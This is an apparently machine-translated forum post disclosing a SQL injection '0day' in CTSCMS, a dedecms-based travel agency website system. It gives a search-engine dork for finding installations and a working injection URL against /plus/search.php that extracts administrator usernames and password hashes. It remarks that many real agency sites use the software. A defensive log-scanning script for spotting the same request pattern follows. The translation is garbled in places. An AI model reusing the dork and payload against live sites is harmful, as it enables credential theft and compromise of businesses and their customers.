
Travel website management system [CTSCMS] 0day - vulnerability warning - the black bar safety net

Description

A New Year's bonus 0day, a small share! The China travel service website management system CTSCMS is something I recently found. It is a secondary development of dedecms and uses the dedecms kernel. Because the vendor has neglected system upgrades, the program has a lot of vulnerabilities. The recently disclosed injection vulnerabilities are all present; whether the older, historical vulnerabilities exist, I don't know.

Google: the 2002-2011 CTSCMS.COM that inurl:users/reg.php travel Agency

POC:
/plus/search. php? keyword=as&typeArr[1 1 1%3D@`\")+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%2 3@__admin`+limit+0,1),1,6 2)))a+from+information_schema. tables+group+by+a)b)%2 3@`\"+]=a

Later I found that this set of programs is in use on many domestic travel agency websites.

Many of the large travel agency websites use it; please test only within the scope the law allows. Hackers take care.....
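For site operators, the request shape in the POC (SQL text placed inside the index of the typeArr parameter of /plus/search.php) can be searched for in web access logs. The following is an added example, not part of the original post or of CTSCMS/dedecms; it assumes combined-format access logs and that legitimate typeArr indexes are plain integers, and the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: legitimate typeArr indexes are plain integers (category ids).
KEY_RE = re.compile(r"^typeArr\[(.*)\]$", re.S)
REQ_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
SQL_HINTS = re.compile(r"\b(select|union|concat|information_schema)\b|[`'\"#()]", re.I)

# Constructed sample log lines (documentation IP ranges, shortened request on line 2).
SAMPLE_LOG = [
    '192.0.2.10 - - [03/Jan/2013:10:00:01 +0800] "GET /plus/search.php?keyword=beijing&typeArr[3]=tour HTTP/1.1" 200 5120',
    '198.51.100.7 - - [03/Jan/2013:10:00:09 +0800] "GET /plus/search.php?keyword=as&typeArr[1%3D@x)+and+(select+1)%23]=a HTTP/1.1" 200 312',
    '203.0.113.5 - - [03/Jan/2013:10:00:12 +0800] "GET /index.php?typeArr[x]=1 HTTP/1.1" 200 900',
]

def suspicious_typearr(url):
    """Return reasons why a request URL looks like injection via a typeArr index."""
    parts = urlsplit(url)
    if not parts.path.lower().endswith("/plus/search.php"):
        return []
    reasons = []
    for name, _value in parse_qsl(parts.query, keep_blank_values=True):
        m = KEY_RE.match(name)  # name is already URL-decoded by parse_qsl
        if not m:
            continue
        key = m.group(1)
        if not re.fullmatch(r"[0-9]+", key):
            reasons.append("non-numeric typeArr index")
        if SQL_HINTS.search(key):
            reasons.append("SQL syntax in typeArr index")
    return reasons

def scan(lines):
    """Return (line number, client address, reasons) for each flagged log line."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQ_RE.search(line)
        reasons = suspicious_typearr(m.group(1)) if m else []
        if reasons:
            hits.append((n, line.split()[0], sorted(set(reasons))))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Requests sent by POST carry the parameter in the body, which access logs do not record, so the same check would need to run in a WAF or application filter to cover them.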